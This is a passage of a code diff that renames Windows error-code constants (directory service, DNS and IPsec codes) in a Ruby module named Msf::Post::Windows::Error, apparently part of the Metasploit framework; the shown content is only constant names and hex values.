= 0x20D5 + DS_MISSING_SUPREF = 0x20D6 + DS_CANT_RETRIEVE_INSTANCE = 0x20D7 + DS_CODE_INCONSISTENCY = 0x20D8 + DS_DATABASE_ERROR = 0x20D9 + DS_GOVERNSID_MISSING = 0x20DA + DS_MISSING_EXPECTED_ATT = 0x20DB + DS_NCNAME_MISSING_CR_REF = 0x20DC + DS_SECURITY_CHECKING_ERROR = 0x20DD + DS_SCHEMA_NOT_LOADED = 0x20DE + DS_SCHEMA_ALLOC_FAILED = 0x20DF + DS_ATT_SCHEMA_REQ_SYNTAX = 0x20E0 + DS_GCVERIFY_ERROR = 0x20E1 + DS_DRA_SCHEMA_MISMATCH = 0x20E2 + DS_CANT_FIND_DSA_OBJ = 0x20E3 + DS_CANT_FIND_EXPECTED_NC = 0x20E4 + DS_CANT_FIND_NC_IN_CACHE = 0x20E5 + DS_CANT_RETRIEVE_CHILD = 0x20E6 + DS_SECURITY_ILLEGAL_MODIFY = 0x20E7 + DS_CANT_REPLACE_HIDDEN_REC = 0x20E8 + DS_BAD_HIERARCHY_FILE = 0x20E9 + DS_BUILD_HIERARCHY_TABLE_FAILED = 0x20EA + DS_CONFIG_PARAM_MISSING = 0x20EB + DS_COUNTING_AB_INDICES_FAILED = 0x20EC + DS_HIERARCHY_TABLE_MALLOC_FAILED = 0x20ED + DS_INTERNAL_FAILURE = 0x20EE + DS_UNKNOWN_ERROR = 0x20EF + DS_ROOT_REQUIRES_CLASS_TOP = 0x20F0 + DS_REFUSING_FSMO_ROLES = 0x20F1 + DS_MISSING_FSMO_SETTINGS = 0x20F2 + DS_UNABLE_TO_SURRENDER_ROLES = 0x20F3 + DS_DRA_GENERIC = 0x20F4 + DS_DRA_INVALID_PARAMETER = 0x20F5 + DS_DRA_BUSY = 0x20F6 + DS_DRA_BAD_DN = 0x20F7 + DS_DRA_BAD_NC = 0x20F8 + DS_DRA_DN_EXISTS = 0x20F9 + DS_DRA_INTERNAL_ERROR = 0x20FA + DS_DRA_INCONSISTENT_DIT = 0x20FB + DS_DRA_CONNECTION_FAILED = 0x20FC + DS_DRA_BAD_INSTANCE_TYPE = 0x20FD + DS_DRA_OUT_OF_MEM = 0x20FE + DS_DRA_MAIL_PROBLEM = 0x20FF + DS_DRA_REF_ALREADY_EXISTS = 0x2100 + DS_DRA_REF_NOT_FOUND = 0x2101 + DS_DRA_OBJ_IS_REP_SOURCE = 0x2102 + DS_DRA_DB_ERROR = 0x2103 + DS_DRA_NO_REPLICA = 0x2104 + DS_DRA_ACCESS_DENIED = 0x2105 + DS_DRA_NOT_SUPPORTED = 0x2106 + DS_DRA_RPC_CANCELLED = 0x2107 + DS_DRA_SOURCE_DISABLED = 0x2108 + DS_DRA_SINK_DISABLED = 0x2109 + DS_DRA_NAME_COLLISION = 0x210A + DS_DRA_SOURCE_REINSTALLED = 0x210B + DS_DRA_MISSING_PARENT = 0x210C + DS_DRA_PREEMPTED = 0x210D + DS_DRA_ABANDON_SYNC = 0x210E + DS_DRA_SHUTDOWN = 0x210F + DS_DRA_INCOMPATIBLE_PARTIAL_SET = 0x2110 + DS_DRA_SOURCE_IS_PARTIAL_REPLICA = 0x2111 + DS_DRA_EXTN_CONNECTION_FAILED = 0x2112 + DS_INSTALL_SCHEMA_MISMATCH = 0x2113 + DS_DUP_LINK_ID = 0x2114 + DS_NAME_RESOLVING = 0x2115 + DS_NAME_NOT_FOUND = 0x2116 + DS_NAME_NOT_UNIQUE = 0x2117 + DS_NAME_NO_MAPPING = 0x2118 + DS_NAME_DOMAIN_ONLY = 0x2119 + DS_NAME_NO_SYNTACTICAL_MAPPING = 0x211A + DS_CONSTRUCTED_ATT_MOD = 0x211B + DS_WRONG_OM_OBJ_CLASS = 0x211C + DS_DRA_REPL_PENDING = 0x211D + DS_DS_REQUIRED = 0x211E + DS_INVALID_LDAP_DISPLAY_NAME = 0x211F + DS_NON_BASE_SEARCH = 0x2120 + DS_CANT_RETRIEVE_ATTS = 0x2121 + DS_BACKLINK_WITHOUT_LINK = 0x2122 + DS_EPOCH_MISMATCH = 0x2123 + DS_SRC_NAME_MISMATCH = 0x2124 + DS_SRC_AND_DST_NC_IDENTICAL = 0x2125 + DS_DST_NC_MISMATCH = 0x2126 + DS_NOT_AUTHORITIVE_FOR_DST_NC = 0x2127 + DS_SRC_GUID_MISMATCH = 0x2128 + DS_CANT_MOVE_DELETED_OBJECT = 0x2129 + DS_PDC_OPERATION_IN_PROGRESS = 0x212A + DS_CROSS_DOMAIN_CLEANUP_REQD = 0x212B + DS_ILLEGAL_XDOM_MOVE_OPERATION = 0x212C + DS_CANT_WITH_ACCT_GROUP_MEMBERSHPS = 0x212D + DS_NC_MUST_HAVE_NC_PARENT = 0x212E + DS_CR_IMPOSSIBLE_TO_VALIDATE = 0x212F + DS_DST_DOMAIN_NOT_NATIVE = 0x2130 + DS_MISSING_INFRASTRUCTURE_CONTAINER = 0x2131 + DS_CANT_MOVE_ACCOUNT_GROUP = 0x2132 + DS_CANT_MOVE_RESOURCE_GROUP = 0x2133 + DS_INVALID_SEARCH_FLAG = 0x2134 + DS_NO_TREE_DELETE_ABOVE_NC = 0x2135 + DS_COULDNT_LOCK_TREE_FOR_DELETE = 0x2136 + DS_COULDNT_IDENTIFY_OBJECTS_FOR_TREE_DELETE = 0x2137 + DS_SAM_INIT_FAILURE = 0x2138 + DS_SENSITIVE_GROUP_VIOLATION = 0x2139 + DS_CANT_MOD_PRIMARYGROUPID = 0x213A + DS_ILLEGAL_BASE_SCHEMA_MOD = 0x213B + DS_NONSAFE_SCHEMA_CHANGE = 0x213C + DS_SCHEMA_UPDATE_DISALLOWED = 0x213D + DS_CANT_CREATE_UNDER_SCHEMA = 0x213E + DS_INSTALL_NO_SRC_SCH_VERSION = 0x213F + DS_INSTALL_NO_SCH_VERSION_IN_INIFILE = 0x2140 + DS_INVALID_GROUP_TYPE = 0x2141 + DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN = 0x2142 + DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN = 0x2143 + DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER = 0x2144 + DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER = 0x2145 + DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER = 0x2146 + DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER = 0x2147 + DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER = 0x2148 + DS_HAVE_PRIMARY_MEMBERS = 0x2149 + DS_STRING_SD_CONVERSION_FAILED = 0x214A + DS_NAMING_MASTER_GC = 0x214B + DS_LOOKUP_FAILURE = 0x214C + DS_COULDNT_UPDATE_SPNS = 0x214D + DS_CANT_RETRIEVE_SD = 0x214E + DS_KEY_NOT_UNIQUE = 0x214F + DS_WRONG_LINKED_ATT_SYNTAX = 0x2150 + DS_SAM_NEED_BOOTKEY_PASSWORD = 0x2151 + DS_SAM_NEED_BOOTKEY_FLOPPY = 0x2152 + DS_CANT_START = 0x2153 + DS_INIT_FAILURE = 0x2154 + DS_NO_PKT_PRIVACY_ON_CONNECTION = 0x2155 + DS_SOURCE_DOMAIN_IN_FOREST = 0x2156 + DS_DESTINATION_DOMAIN_NOT_IN_FOREST = 0x2157 + DS_DESTINATION_AUDITING_NOT_ENABLED = 0x2158 + DS_CANT_FIND_DC_FOR_SRC_DOMAIN = 0x2159 + DS_SRC_OBJ_NOT_GROUP_OR_USER = 0x215A + DS_SRC_SID_EXISTS_IN_FOREST = 0x215B + DS_SRC_AND_DST_OBJECT_CLASS_MISMATCH = 0x215C + SAM_INIT_FAILURE = 0x215D + DS_DRA_SCHEMA_INFO_SHIP = 0x215E + DS_DRA_SCHEMA_CONFLICT = 0x215F + DS_DRA_EARLIER_SCHEMA_CONLICT = 0x2160 + DS_DRA_OBJ_NC_MISMATCH = 0x2161 + DS_NC_STILL_HAS_DSAS = 0x2162 + DS_GC_REQUIRED = 0x2163 + DS_LOCAL_MEMBER_OF_LOCAL_ONLY = 0x2164 + DS_NO_FPO_IN_UNIVERSAL_GROUPS = 0x2165 + DS_CANT_ADD_TO_GC = 0x2166 + DS_NO_CHECKPOINT_WITH_PDC = 0x2167 + DS_SOURCE_AUDITING_NOT_ENABLED = 0x2168 + DS_CANT_CREATE_IN_NONDOMAIN_NC = 0x2169 + DS_INVALID_NAME_FOR_SPN = 0x216A + DS_FILTER_USES_CONTRUCTED_ATTRS = 0x216B + DS_UNICODEPWD_NOT_IN_QUOTES = 0x216C + DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED = 0x216D + DS_MUST_BE_RUN_ON_DST_DC = 0x216E + DS_SRC_DC_MUST_BE_SP4_OR_GREATER = 0x216F + DS_CANT_TREE_DELETE_CRITICAL_OBJ = 0x2170 + DS_INIT_FAILURE_CONSOLE = 0x2171 + DS_SAM_INIT_FAILURE_CONSOLE = 0x2172 + DS_FOREST_VERSION_TOO_HIGH = 0x2173 + DS_DOMAIN_VERSION_TOO_HIGH = 0x2174 + DS_FOREST_VERSION_TOO_LOW = 0x2175 + DS_DOMAIN_VERSION_TOO_LOW = 0x2176 + DS_INCOMPATIBLE_VERSION = 0x2177 + DS_LOW_DSA_VERSION = 0x2178 + DS_NO_BEHAVIOR_VERSION_IN_MIXEDDOMAIN = 0x2179 + DS_NOT_SUPPORTED_SORT_ORDER = 0x217A + DS_NAME_NOT_UNIQUE = 0x217B + DS_MACHINE_ACCOUNT_CREATED_PRENT4 = 0x217C + DS_OUT_OF_VERSION_STORE = 0x217D + DS_INCOMPATIBLE_CONTROLS_USED = 0x217E + DS_NO_REF_DOMAIN = 0x217F + DS_RESERVED_LINK_ID = 0x2180 + DS_LINK_ID_NOT_AVAILABLE = 0x2181 + DS_AG_CANT_HAVE_UNIVERSAL_MEMBER = 0x2182 + DS_MODIFYDN_DISALLOWED_BY_INSTANCE_TYPE = 0x2183 + DS_NO_OBJECT_MOVE_IN_SCHEMA_NC = 0x2184 + DS_MODIFYDN_DISALLOWED_BY_FLAG = 0x2185 + DS_MODIFYDN_WRONG_GRANDPARENT = 0x2186 + DS_NAME_TRUST_REFERRAL = 0x2187 + NOT_SUPPORTED_ON_STANDARD_SERVER = 0x2188 + DS_CANT_ACCESS_REMOTE_PART_OF_AD = 0x2189 + DS_CR_IMPOSSIBLE_TO_VALIDATE_V2 = 0x218A + DS_THREAD_LIMIT_EXCEEDED = 0x218B + DS_NOT_CLOSEST = 0x218C + DS_CANT_DERIVE_SPN_WITHOUT_SERVER_REF = 0x218D + DS_SINGLE_USER_MODE_FAILED = 0x218E + DS_NTDSCRIPT_SYNTAX_ERROR = 0x218F + DS_NTDSCRIPT_PROCESS_ERROR = 0x2190 + DS_DIFFERENT_REPL_EPOCHS = 0x2191 + DS_DRS_EXTENSIONS_CHANGED = 0x2192 + DS_REPLICA_SET_CHANGE_NOT_ALLOWED_ON_DISABLED_CR = 0x2193 + DS_NO_MSDS_INTID = 0x2194 + DS_DUP_MSDS_INTID = 0x2195 + DS_EXISTS_IN_RDNATTID = 0x2196 + DS_AUTHORIZATION_FAILED = 0x2197 + DS_INVALID_SCRIPT = 0x2198 + DS_REMOTE_CROSSREF_OP_FAILED = 0x2199 + DS_CROSS_REF_BUSY = 0x219A + DS_CANT_DERIVE_SPN_FOR_DELETED_DOMAIN = 0x219B + DS_CANT_DEMOTE_WITH_WRITEABLE_NC = 0x219C + DS_DUPLICATE_ID_FOUND = 0x219D + DS_INSUFFICIENT_ATTR_TO_CREATE_OBJECT = 0x219E + DS_GROUP_CONVERSION_ERROR = 0x219F + DS_CANT_MOVE_APP_BASIC_GROUP = 0x21A0 + DS_CANT_MOVE_APP_QUERY_GROUP = 0x21A1 + DS_ROLE_NOT_VERIFIED = 0x21A2 + DS_WKO_CONTAINER_CANNOT_BE_SPECIAL = 0x21A3 + DS_DOMAIN_RENAME_IN_PROGRESS = 0x21A4 + DS_EXISTING_AD_CHILD_NC = 0x21A5 + DS_REPL_LIFETIME_EXCEEDED = 0x21A6 + DS_DISALLOWED_IN_SYSTEM_CONTAINER = 0x21A7 + DS_LDAP_SEND_QUEUE_FULL = 0x21A8 + DS_DRA_OUT_SCHEDULE_WINDOW = 0x21A9 + DS_POLICY_NOT_KNOWN = 0x21AA + NO_SITE_SETTINGS_OBJECT = 0x21AB + NO_SECRETS = 0x21AC + NO_WRITABLE_DC_FOUND = 0x21AD + DS_NO_SERVER_OBJECT = 0x21AE + DS_NO_NTDSA_OBJECT = 0x21AF + DS_NON_ASQ_SEARCH = 0x21B0 + DS_AUDIT_FAILURE = 0x21B1 + DS_INVALID_SEARCH_FLAG_SUBTREE = 0x21B2 + DS_INVALID_SEARCH_FLAG_TUPLE = 0x21B3 + DS_HIERARCHY_TABLE_TOO_DEEP = 0x21B4 + DS_DRA_CORRUPT_UTD_VECTOR = 0x21B5 + DS_DRA_SECRETS_DENIED = 0x21B6 + DS_RESERVED_MAPI_ID = 0x21B7 + DS_MAPI_ID_NOT_AVAILABLE = 0x21B8 + DS_DRA_MISSING_KRBTGT_SECRET = 0x21B9 + DS_DOMAIN_NAME_EXISTS_IN_FOREST = 0x21BA + DS_FLAT_NAME_EXISTS_IN_FOREST = 0x21BB + INVALID_USER_PRINCIPAL_NAME = 0x21BC + DS_OID_MAPPED_GROUP_CANT_HAVE_MEMBERS = 0x21BD + DS_OID_NOT_FOUND = 0x21BE + DS_DRA_RECYCLED_TARGET = 0x21BF + DNS_RCODE_FORMAT_ERROR = 0x2329 + DNS_RCODE_SERVER_FAILURE = 0x232A + DNS_RCODE_NAME_ERROR = 0x232B + DNS_RCODE_NOT_IMPLEMENTED = 0x232C + DNS_RCODE_REFUSED = 0x232D + DNS_RCODE_YXDOMAIN = 0x232E + DNS_RCODE_YXRRSET = 0x232F + DNS_RCODE_NXRRSET = 0x2330 + DNS_RCODE_NOTAUTH = 0x2331 + DNS_RCODE_NOTZONE = 0x2332 + DNS_RCODE_BADSIG = 0x2338 + DNS_RCODE_BADKEY = 0x2339 + DNS_RCODE_BADTIME = 0x233A DNS_INFO_NO_RECORDS = 0x251D - DNS_ERROR_BAD_PACKET = 0x251E - DNS_ERROR_NO_PACKET = 0x251F - DNS_ERROR_RCODE = 0x2520 - DNS_ERROR_UNSECURE_PACKET = 0x2521 - DNS_ERROR_INVALID_TYPE = 0x254F - DNS_ERROR_INVALID_IP_ADDRESS = 0x2550 - DNS_ERROR_INVALID_PROPERTY = 0x2551 - DNS_ERROR_TRY_AGAIN_LATER = 0x2552 - DNS_ERROR_NOT_UNIQUE = 0x2553 - DNS_ERROR_NON_RFC_NAME = 0x2554 + DNS_BAD_PACKET = 0x251E + DNS_NO_PACKET = 0x251F + DNS_RCODE = 0x2520 + DNS_UNSECURE_PACKET = 0x2521 + DNS_INVALID_TYPE = 0x254F + DNS_INVALID_IP_ADDRESS = 0x2550 + DNS_INVALID_PROPERTY = 0x2551 + DNS_TRY_AGAIN_LATER = 0x2552 + DNS_NOT_UNIQUE = 0x2553 + DNS_NON_RFC_NAME = 0x2554 DNS_STATUS_FQDN = 0x2555 DNS_STATUS_DOTTED_NAME = 0x2556 DNS_STATUS_SINGLE_PART_NAME = 0x2557 - DNS_ERROR_INVALID_NAME_CHAR = 0x2558 - DNS_ERROR_NUMERIC_NAME = 0x2559 - DNS_ERROR_NOT_ALLOWED_ON_ROOT_SERVER = 0x255A - DNS_ERROR_NOT_ALLOWED_UNDER_DELEGATION = 0x255B - DNS_ERROR_CANNOT_FIND_ROOT_HINTS = 0x255C - DNS_ERROR_INCONSISTENT_ROOT_HINTS = 0x255D - DNS_ERROR_DWORD_VALUE_TOO_SMALL = 0x255E - DNS_ERROR_DWORD_VALUE_TOO_LARGE = 0x255F - DNS_ERROR_BACKGROUND_LOADING = 0x2560 - DNS_ERROR_NOT_ALLOWED_ON_RODC = 0x2561 - DNS_ERROR_NOT_ALLOWED_UNDER_DNAME = 0x2562 - DNS_ERROR_DELEGATION_REQUIRED = 0x2563 - DNS_ERROR_INVALID_POLICY_TABLE = 0x2564 - DNS_ERROR_ZONE_DOES_NOT_EXIST = 0x2581 - DNS_ERROR_NO_ZONE_INFO = 0x2582 - DNS_ERROR_INVALID_ZONE_OPERATION = 0x2583 - DNS_ERROR_ZONE_CONFIGURATION_ERROR = 0x2584 - DNS_ERROR_ZONE_HAS_NO_SOA_RECORD = 0x2585 - DNS_ERROR_ZONE_HAS_NO_NS_RECORDS = 0x2586 - DNS_ERROR_ZONE_LOCKED = 0x2587 - DNS_ERROR_ZONE_CREATION_FAILED = 0x2588 - DNS_ERROR_ZONE_ALREADY_EXISTS = 0x2589 - DNS_ERROR_AUTOZONE_ALREADY_EXISTS = 0x258A - DNS_ERROR_INVALID_ZONE_TYPE = 0x258B - DNS_ERROR_SECONDARY_REQUIRES_MASTER_IP = 0x258C - DNS_ERROR_ZONE_NOT_SECONDARY = 0x258D - DNS_ERROR_NEED_SECONDARY_ADDRESSES = 0x258E - DNS_ERROR_WINS_INIT_FAILED = 0x258F - DNS_ERROR_NEED_WINS_SERVERS = 0x2590 - DNS_ERROR_NBSTAT_INIT_FAILED = 0x2591 - DNS_ERROR_SOA_DELETE_INVALID = 0x2592 - DNS_ERROR_FORWARDER_ALREADY_EXISTS = 0x2593 - DNS_ERROR_ZONE_REQUIRES_MASTER_IP = 0x2594 - DNS_ERROR_ZONE_IS_SHUTDOWN = 0x2595 - DNS_ERROR_PRIMARY_REQUIRES_DATAFILE = 0x25B3 - DNS_ERROR_INVALID_DATAFILE_NAME = 0x25B4 - DNS_ERROR_DATAFILE_OPEN_FAILURE = 0x25B5 - DNS_ERROR_FILE_WRITEBACK_FAILED = 0x25B6 - DNS_ERROR_DATAFILE_PARSING = 0x25B7 - DNS_ERROR_RECORD_DOES_NOT_EXIST = 0x25E5 - DNS_ERROR_RECORD_FORMAT = 0x25E6 - DNS_ERROR_NODE_CREATION_FAILED = 0x25E7 - DNS_ERROR_UNKNOWN_RECORD_TYPE = 0x25E8 - DNS_ERROR_RECORD_TIMED_OUT = 0x25E9 - DNS_ERROR_NAME_NOT_IN_ZONE = 0x25EA - DNS_ERROR_CNAME_LOOP = 0x25EB - DNS_ERROR_NODE_IS_CNAME = 0x25EC - DNS_ERROR_CNAME_COLLISION = 0x25ED - DNS_ERROR_RECORD_ONLY_AT_ZONE_ROOT = 0x25EE - DNS_ERROR_RECORD_ALREADY_EXISTS = 0x25EF - DNS_ERROR_SECONDARY_DATA = 0x25F0 - DNS_ERROR_NO_CREATE_CACHE_DATA = 0x25F1 - DNS_ERROR_NAME_DOES_NOT_EXIST = 0x25F2 + DNS_INVALID_NAME_CHAR = 0x2558 + DNS_NUMERIC_NAME = 0x2559 + DNS_NOT_ALLOWED_ON_ROOT_SERVER = 0x255A + DNS_NOT_ALLOWED_UNDER_DELEGATION = 0x255B + DNS_CANNOT_FIND_ROOT_HINTS = 0x255C + DNS_INCONSISTENT_ROOT_HINTS = 0x255D + DNS_DWORD_VALUE_TOO_SMALL = 0x255E + DNS_DWORD_VALUE_TOO_LARGE = 0x255F + DNS_BACKGROUND_LOADING = 0x2560 + DNS_NOT_ALLOWED_ON_RODC = 0x2561 + DNS_NOT_ALLOWED_UNDER_DNAME = 0x2562 + DNS_DELEGATION_REQUIRED = 0x2563 + DNS_INVALID_POLICY_TABLE = 0x2564 + DNS_ZONE_DOES_NOT_EXIST = 0x2581 + DNS_NO_ZONE_INFO = 0x2582 + DNS_INVALID_ZONE_OPERATION = 0x2583 + DNS_ZONE_CONFIGURATION_ERROR = 0x2584 + DNS_ZONE_HAS_NO_SOA_RECORD = 0x2585 + DNS_ZONE_HAS_NO_NS_RECORDS = 0x2586 + DNS_ZONE_LOCKED = 0x2587 + DNS_ZONE_CREATION_FAILED = 0x2588 + DNS_ZONE_ALREADY_EXISTS = 0x2589 + DNS_AUTOZONE_ALREADY_EXISTS = 0x258A + DNS_INVALID_ZONE_TYPE = 0x258B + DNS_SECONDARY_REQUIRES_MASTER_IP = 0x258C + DNS_ZONE_NOT_SECONDARY = 0x258D + DNS_NEED_SECONDARY_ADDRESSES = 0x258E + DNS_WINS_INIT_FAILED = 0x258F + DNS_NEED_WINS_SERVERS = 0x2590 + DNS_NBSTAT_INIT_FAILED = 0x2591 + DNS_SOA_DELETE_INVALID = 0x2592 + DNS_FORWARDER_ALREADY_EXISTS = 0x2593 + DNS_ZONE_REQUIRES_MASTER_IP = 0x2594 + DNS_ZONE_IS_SHUTDOWN = 0x2595 + DNS_PRIMARY_REQUIRES_DATAFILE = 0x25B3 + DNS_INVALID_DATAFILE_NAME = 0x25B4 + DNS_DATAFILE_OPEN_FAILURE = 0x25B5 + DNS_FILE_WRITEBACK_FAILED = 0x25B6 + DNS_DATAFILE_PARSING = 0x25B7 + DNS_RECORD_DOES_NOT_EXIST = 0x25E5 + DNS_RECORD_FORMAT = 0x25E6 + DNS_NODE_CREATION_FAILED = 0x25E7 + DNS_UNKNOWN_RECORD_TYPE = 0x25E8 + DNS_RECORD_TIMED_OUT = 0x25E9 + DNS_NAME_NOT_IN_ZONE = 0x25EA + DNS_CNAME_LOOP = 0x25EB + DNS_NODE_IS_CNAME = 0x25EC + DNS_CNAME_COLLISION = 0x25ED + DNS_RECORD_ONLY_AT_ZONE_ROOT = 0x25EE + DNS_RECORD_ALREADY_EXISTS = 0x25EF + DNS_SECONDARY_DATA = 0x25F0 + DNS_NO_CREATE_CACHE_DATA = 0x25F1 + DNS_NAME_DOES_NOT_EXIST = 0x25F2 DNS_WARNING_PTR_CREATE_FAILED = 0x25F3 DNS_WARNING_DOMAIN_UNDELETED = 0x25F4 - DNS_ERROR_DS_UNAVAILABLE = 0x25F5 - DNS_ERROR_DS_ZONE_ALREADY_EXISTS = 0x25F6 - DNS_ERROR_NO_BOOTFILE_IF_DS_ZONE = 0x25F7 - DNS_ERROR_NODE_IS_DNAME = 0x25F8 - DNS_ERROR_DNAME_COLLISION = 0x25F9 - DNS_ERROR_ALIAS_LOOP = 0x25FA + DNS_DS_UNAVAILABLE = 0x25F5 + DNS_DS_ZONE_ALREADY_EXISTS = 0x25F6 + DNS_NO_BOOTFILE_IF_DS_ZONE = 0x25F7 + DNS_NODE_IS_DNAME = 0x25F8 + DNS_DNAME_COLLISION = 0x25F9 + DNS_ALIAS_LOOP = 0x25FA DNS_INFO_AXFR_COMPLETE = 0x2617 - DNS_ERROR_AXFR = 0x2618 + DNS_AXFR = 0x2618 DNS_INFO_ADDED_LOCAL_WINS = 0x2619 DNS_STATUS_CONTINUE_NEEDED = 0x2649 - DNS_ERROR_NO_TCPIP = 0x267B - DNS_ERROR_NO_DNS_SERVERS = 0x267C - DNS_ERROR_DP_DOES_NOT_EXIST = 0x26AD - DNS_ERROR_DP_ALREADY_EXISTS = 0x26AE - DNS_ERROR_DP_NOT_ENLISTED = 0x26AF - DNS_ERROR_DP_ALREADY_ENLISTED = 0x26B0 - DNS_ERROR_DP_NOT_AVAILABLE = 0x26B1 - DNS_ERROR_DP_FSMO_ERROR = 0x26B2 + DNS_NO_TCPIP = 0x267B + DNS_NO_DNS_SERVERS = 0x267C + DNS_DP_DOES_NOT_EXIST = 0x26AD + DNS_DP_ALREADY_EXISTS = 0x26AE + DNS_DP_NOT_ENLISTED = 0x26AF + DNS_DP_ALREADY_ENLISTED = 0x26B0 + DNS_DP_NOT_AVAILABLE = 0x26B1 + DNS_DP_FSMO_ERROR = 0x26B2 WSAEINTR = 0x2714 WSAEBADF = 0x2719 WSAEACCES = 0x271D @@ -2201,331 +2201,331 @@ module Msf::Post::Windows::Error WSA_QOS_ESDMODEOBJ = 0x2B15 WSA_QOS_ESHAPERATEOBJ = 0x2B16 WSA_QOS_RESERVED_PETYPE = 0x2B17 - ERROR_IPSEC_QM_POLICY_EXISTS = 0x32C8 - ERROR_IPSEC_QM_POLICY_NOT_FOUND = 0x32C9 - ERROR_IPSEC_QM_POLICY_IN_USE = 0x32CA - ERROR_IPSEC_MM_POLICY_EXISTS = 0x32CB - ERROR_IPSEC_MM_POLICY_NOT_FOUND = 0x32CC - ERROR_IPSEC_MM_POLICY_IN_USE = 0x32CD - ERROR_IPSEC_MM_FILTER_EXISTS = 0x32CE - ERROR_IPSEC_MM_FILTER_NOT_FOUND = 0x32CF - ERROR_IPSEC_TRANSPORT_FILTER_EXISTS = 0x32D0 - ERROR_IPSEC_TRANSPORT_FILTER_NOT_FOUND = 0x32D1 - ERROR_IPSEC_MM_AUTH_EXISTS = 0x32D2 - ERROR_IPSEC_MM_AUTH_NOT_FOUND = 0x32D3 - ERROR_IPSEC_MM_AUTH_IN_USE = 0x32D4 - ERROR_IPSEC_DEFAULT_MM_POLICY_NOT_FOUND = 0x32D5 - ERROR_IPSEC_DEFAULT_MM_AUTH_NOT_FOUND = 0x32D6 - ERROR_IPSEC_DEFAULT_QM_POLICY_NOT_FOUND = 0x32D7 - ERROR_IPSEC_TUNNEL_FILTER_EXISTS = 0x32D8 - ERROR_IPSEC_TUNNEL_FILTER_NOT_FOUND = 0x32D9 - ERROR_IPSEC_MM_FILTER_PENDING_DELETION = 0x32DA - ERROR_IPSEC_TRANSPORT_FILTER_PENDING_DELETION = 0x32DB - ERROR_IPSEC_TUNNEL_FILTER_PENDING_DELETION = 0x32DC - ERROR_IPSEC_MM_POLICY_PENDING_DELETION = 0x32DD - ERROR_IPSEC_MM_AUTH_PENDING_DELETION = 0x32DE - ERROR_IPSEC_QM_POLICY_PENDING_DELETION = 0x32DF + IPSEC_QM_POLICY_EXISTS = 0x32C8 + IPSEC_QM_POLICY_NOT_FOUND = 0x32C9 + IPSEC_QM_POLICY_IN_USE = 0x32CA + IPSEC_MM_POLICY_EXISTS = 0x32CB + IPSEC_MM_POLICY_NOT_FOUND = 0x32CC + IPSEC_MM_POLICY_IN_USE = 0x32CD + IPSEC_MM_FILTER_EXISTS = 0x32CE + IPSEC_MM_FILTER_NOT_FOUND = 0x32CF + IPSEC_TRANSPORT_FILTER_EXISTS = 0x32D0 + IPSEC_TRANSPORT_FILTER_NOT_FOUND = 0x32D1 + IPSEC_MM_AUTH_EXISTS = 0x32D2 + IPSEC_MM_AUTH_NOT_FOUND = 0x32D3 + IPSEC_MM_AUTH_IN_USE = 0x32D4 + IPSEC_DEFAULT_MM_POLICY_NOT_FOUND = 0x32D5 + IPSEC_DEFAULT_MM_AUTH_NOT_FOUND = 0x32D6 + IPSEC_DEFAULT_QM_POLICY_NOT_FOUND = 0x32D7 + IPSEC_TUNNEL_FILTER_EXISTS = 0x32D8 + IPSEC_TUNNEL_FILTER_NOT_FOUND = 0x32D9 + IPSEC_MM_FILTER_PENDING_DELETION = 0x32DA + IPSEC_TRANSPORT_FILTER_PENDING_DELETION = 0x32DB + IPSEC_TUNNEL_FILTER_PENDING_DELETION = 0x32DC + IPSEC_MM_POLICY_PENDING_DELETION = 0x32DD + IPSEC_MM_AUTH_PENDING_DELETION = 0x32DE + IPSEC_QM_POLICY_PENDING_DELETION = 0x32DF WARNING_IPSEC_MM_POLICY_PRUNED = 0x32E0 WARNING_IPSEC_QM_POLICY_PRUNED = 0x32E1 - ERROR_IPSEC_IKE_AUTH_FAIL = 0x35E9 - ERROR_IPSEC_IKE_ATTRIB_FAIL = 0x35EA - ERROR_IPSEC_IKE_NEGOTIATION_PENDING = 0x35EB - ERROR_IPSEC_IKE_GENERAL_PROCESSING_ERROR = 0x35EC - ERROR_IPSEC_IKE_TIMED_OUT = 0x35ED - ERROR_IPSEC_IKE_NO_CERT = 0x35EE - ERROR_IPSEC_IKE_SA_DELETED = 0x35EF - ERROR_IPSEC_IKE_SA_REAPED = 0x35F0 - ERROR_IPSEC_IKE_MM_ACQUIRE_DROP = 0x35F1 - ERROR_IPSEC_IKE_QM_ACQUIRE_DROP = 0x35F2 - ERROR_IPSEC_IKE_QUEUE_DROP_MM = 0x35F3 - ERROR_IPSEC_IKE_QUEUE_DROP_NO_MM = 0x35F4 - ERROR_IPSEC_IKE_DROP_NO_RESPONSE = 0x35F5 - ERROR_IPSEC_IKE_MM_DELAY_DROP = 0x35F6 - ERROR_IPSEC_IKE_QM_DELAY_DROP = 0x35F7 - ERROR_IPSEC_IKE_ERROR = 0x35F8 - ERROR_IPSEC_IKE_CRL_FAILED = 0x35F9 - ERROR_IPSEC_IKE_INVALID_KEY_USAGE = 0x35FA - ERROR_IPSEC_IKE_INVALID_CERT_TYPE = 0x35FB - ERROR_IPSEC_IKE_NO_PRIVATE_KEY = 0x35FC - ERROR_IPSEC_IKE_DH_FAIL = 0x35FE - ERROR_IPSEC_IKE_CRITICAL_PAYLOAD_NOT_RECOGNIZED = 0x35FF - ERROR_IPSEC_IKE_INVALID_HEADER = 0x3600 - ERROR_IPSEC_IKE_NO_POLICY = 0x3601 - ERROR_IPSEC_IKE_INVALID_SIGNATURE = 0x3602 - ERROR_IPSEC_IKE_KERBEROS_ERROR = 0x3603 - ERROR_IPSEC_IKE_NO_PUBLIC_KEY = 0x3604 - ERROR_IPSEC_IKE_PROCESS_ERR = 0x3605 - ERROR_IPSEC_IKE_PROCESS_ERR_SA = 0x3606 - ERROR_IPSEC_IKE_PROCESS_ERR_PROP = 0x3607 - ERROR_IPSEC_IKE_PROCESS_ERR_TRANS = 0x3608 - ERROR_IPSEC_IKE_PROCESS_ERR_KE = 0x3609 - ERROR_IPSEC_IKE_PROCESS_ERR_ID = 0x360A - ERROR_IPSEC_IKE_PROCESS_ERR_CERT = 0x360B - ERROR_IPSEC_IKE_PROCESS_ERR_CERT_REQ = 0x360C - ERROR_IPSEC_IKE_PROCESS_ERR_HASH = 0x360D - ERROR_IPSEC_IKE_PROCESS_ERR_SIG = 0x360E - 